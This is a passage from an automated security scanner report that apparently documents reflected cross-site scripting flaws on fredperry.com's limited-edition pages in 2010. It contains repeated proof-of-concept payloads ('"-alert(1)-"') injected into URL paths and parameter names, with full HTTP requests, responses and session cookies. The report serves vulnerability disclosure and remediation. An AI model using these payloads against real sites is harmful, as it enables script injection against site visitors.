HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:12:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=tq0lkqj1ku5kt3qfsve5dv2lu0; expires=Tue, 09-Nov-2010 17:12:10 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29400
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons-centenary-outfit/?911a8"-alert(1)-"6872c7ca1c6=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e13"-alert(1)-"1e1df12ea80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition27e13"-alert(1)-"1e1df12ea80/men/collaboration-raf-simons/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:08:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=4hofbk9rao1b3tbe0ko177upb5; expires=Tue, 09-Nov-2010 17:08:15 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29380
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition27e13"-alert(1)-"1e1df12ea80/men/collaboration-raf-simons/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29976"-alert(1)-"56522880a08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men29976"-alert(1)-"56522880a08/collaboration-raf-simons/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:08:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=h3d2v4e6cnf09ine2ihuj62p74; expires=Tue, 09-Nov-2010 17:08:35 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29380
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men29976"-alert(1)-"56522880a08/collaboration-raf-simons/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f7b"-alert(1)-"9130791ac77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/collaboration-raf-simonsc8f7b"-alert(1)-"9130791ac77/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:09:03 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=f4lees3sdljodl2notjhfc64m1; expires=Tue, 09-Nov-2010 17:09:03 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29380
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simonsc8f7b"-alert(1)-"9130791ac77/"); //]]> ...[SNIP]...
The value of the SID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6089"-alert(1)-"78f69521811 was submitted in the SID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/collaboration-raf-simons/?SID=2hPWQxiLpIPJPjREOVJiLvolj/gt24Tjf99vflOKNYQ=b6089"-alert(1)-"78f69521811 HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/home/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.3.10.1289349290
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons/?SID=2hPWQxiLpIPJPjREOVJiLvolj/gt24Tjf99vflOKNYQ=b6089"-alert(1)-"78f69521811"); //]]> ...[SNIP]...
1.106. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/collaboration-raf-simons/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 753ab"-alert(1)-"f5f7eed41f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/collaboration-raf-simons/?753ab"-alert(1)-"f5f7eed41f2=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons/?753ab"-alert(1)-"f5f7eed41f2=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 979cb"-alert(1)-"bd24e099cfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition979cb"-alert(1)-"bd24e099cfd/men/footwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:12:38 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=b5ovimaq1a269sva272fjhn656; expires=Tue, 09-Nov-2010 17:12:38 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition979cb"-alert(1)-"bd24e099cfd/men/footwear/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bc3d"-alert(1)-"169d283a576 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men7bc3d"-alert(1)-"169d283a576/footwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:03 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=im80s9cq1u9q59qolfhjvgc0a6; expires=Tue, 09-Nov-2010 17:13:03 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men7bc3d"-alert(1)-"169d283a576/footwear/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc2b9"-alert(1)-"be53c83d711 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/footwearbc2b9"-alert(1)-"be53c83d711/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=494opmqoclu78ed6ptci9eaf06; expires=Tue, 09-Nov-2010 17:13:37 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/footwearbc2b9"-alert(1)-"be53c83d711/"); //]]> ...[SNIP]...
1.110. http://www.fredperry.com/limited-edition/men/footwear/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/footwear/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e0e7"-alert(1)-"38b1976be02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/footwear/?9e0e7"-alert(1)-"38b1976be02=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/footwear/?9e0e7"-alert(1)-"38b1976be02=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87423"-alert(1)-"78a5c0855dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition87423"-alert(1)-"78a5c0855dc/men/jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=4nuf1et02e07oi73qvqof1qh46; expires=Tue, 09-Nov-2010 17:13:28 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition87423"-alert(1)-"78a5c0855dc/men/jackets/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee837"-alert(1)-"f8707917c46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/menee837"-alert(1)-"f8707917c46/jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=5c1cf8cj9pbs5m5honuqit50q1; expires=Tue, 09-Nov-2010 17:13:56 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/menee837"-alert(1)-"f8707917c46/jackets/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94014"-alert(1)-"d16e6883150 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/jackets94014"-alert(1)-"d16e6883150/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=4edgddt3us8kdggun3pnup1cu7; expires=Tue, 09-Nov-2010 17:14:33 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/jackets94014"-alert(1)-"d16e6883150/"); //]]> ...[SNIP]...
1.114. http://www.fredperry.com/limited-edition/men/jackets/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/jackets/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91787"-alert(1)-"5d4b3174de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/jackets/?91787"-alert(1)-"5d4b3174de=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/jackets/?91787"-alert(1)-"5d4b3174de=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dddb"-alert(1)-"34b8e81cc19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition4dddb"-alert(1)-"34b8e81cc19/men/knitwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=n9ra8r0sau1t0h6t9nemlua6p4; expires=Tue, 09-Nov-2010 17:13:46 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition4dddb"-alert(1)-"34b8e81cc19/men/knitwear/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7881"-alert(1)-"0fee6082005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/menf7881"-alert(1)-"0fee6082005/knitwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=of96rkse531fjcp0dee2fp1jp2; expires=Tue, 09-Nov-2010 17:14:02 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
